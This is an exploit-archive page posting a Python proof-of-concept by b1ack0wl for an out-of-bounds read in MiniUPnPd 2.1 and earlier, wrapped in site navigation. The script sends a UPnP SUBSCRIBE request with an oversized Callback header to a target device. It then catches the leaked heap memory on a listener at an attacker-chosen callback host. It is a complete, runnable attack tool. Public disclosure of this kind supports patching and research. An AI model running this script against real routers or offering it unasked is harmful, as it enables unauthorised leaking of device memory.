MiniUPnPd 2.1 Out-Of-Bounds Read

MiniUPnPd 2.1 Out-Of-Bounds Read: Posted Jan 29, 2019; Authored by b1ack0wl; MiniUPnPd versions 2.1 and below suffer from an out-of-bounds read vulnerability.; tags | exploit; SHA-256 | 2aaa71d09817976536dfc7a03db1bc67d6ef7fb15b152cb8ac3c8251862a3b07; Download | Favorite | View

MiniUPnPd 2.1 Out-Of-Bounds Read

#!/usr/bin/python3
# miniupnpd <= v2.1 read out-of-bounds PoC
# by b1ack0wl
# https://github.com/b1ack0wl/miniupnpd_poc

import requests, socketserver, argparse, sys

class OK_HTTP_Response(socketserver.StreamRequestHandler):
  def handle(self):
    self.request.settimeout(self.server.timeout)
    self.server.notify = b""
    try:
      line = self.rfile.read(1)
      while len(line) > 0:
        self.server.notify += line
        line = self.rfile.read(1)
    except:
      pass
    self.wfile.write(b"HTTP/1.1 200 OK\r\n\r\n")

def splash():
  print("[*] miniupnpd <= v2.1 read out-of-bounds vulnerability [PoC]")
  print("[*] by b1ack0wl")

def leak_data(args):
  leak_size = ((1024*args.leak_amount)+526)
  callback_uri= "A" * leak_size
  headers= {'NT': 'upnp:event', 'Callback': '<http://{}:{}/{}>'.format(args.callback_ip,args.callback_port,callback_uri), 'Timeout': 'Second-20'}
  server = socketserver.TCPServer((args.callback_ip, args.callback_port), OK_HTTP_Response)
  server.timeout = args.timeout
  print("[+] Sending request...")
  requests.request(method="SUBSCRIBE",url="http://{}:{}/evt/L3F".format(args.target_ip,args.target_port),headers=headers,timeout=args.timeout)
  server.handle_request()
  leaked_data = server.notify[1023::] # Skip over the first 1024 bytes since it just contains 'NOTIFY /AAA...'
  print("[+] Leaked Data: {}".format(leaked_data))
  print("[+] Leaked Length: {}".format(len(leaked_data)))
  print("[+] Done")

def main():
  poc_parser = argparse.ArgumentParser( add_help=True, description='Miniupnpd <= v2.1 read out-of-bounds vulnerability',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
  poc_parser.add_argument('target_ip', help='IP address of vulnerable device.')
  poc_parser.add_argument('target_port', default=5000, help="Target Port.", type=int)
  poc_parser.add_argument('--callback_ip', help="Local IP address for httpd listener.", type=str)
  poc_parser.add_argument('--callback_port', help="Local port for httpd listener.", type=int)
  poc_parser.add_argument('--timeout', default=5, help="Timeout for http requests (in seconds).", type=float)
  poc_parser.add_argument('--leak_amount', default=1, help="Amount of arbitrary heap data to leak (in KB).", type=int)
  args = poc_parser.parse_args()
  arguments = ['target_ip', 'target_port', 'callback_ip', 'callback_port' ]
  for i in arguments:
    if getattr(args, i) == None:
      poc_parser.print_help()
      sys.exit(1)
  leak_data(args)

if __name__ == '__main__':
    splash()
    main()

Top Authors In Last 30 Days

Red Hat 260 files
Ubuntu 90 files
indoushka 64 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 15 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,090)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,547)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,646)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,729)
UNIX (9,433)
UnixWare (187)
Windows (6,670)
Other

MiniUPnPd 2.1 Out-Of-Bounds Read

MiniUPnPd 2.1 Out-Of-Bounds Read

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MiniUPnPd 2.1 Out-Of-Bounds Read

Share This

MiniUPnPd 2.1 Out-Of-Bounds Read

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems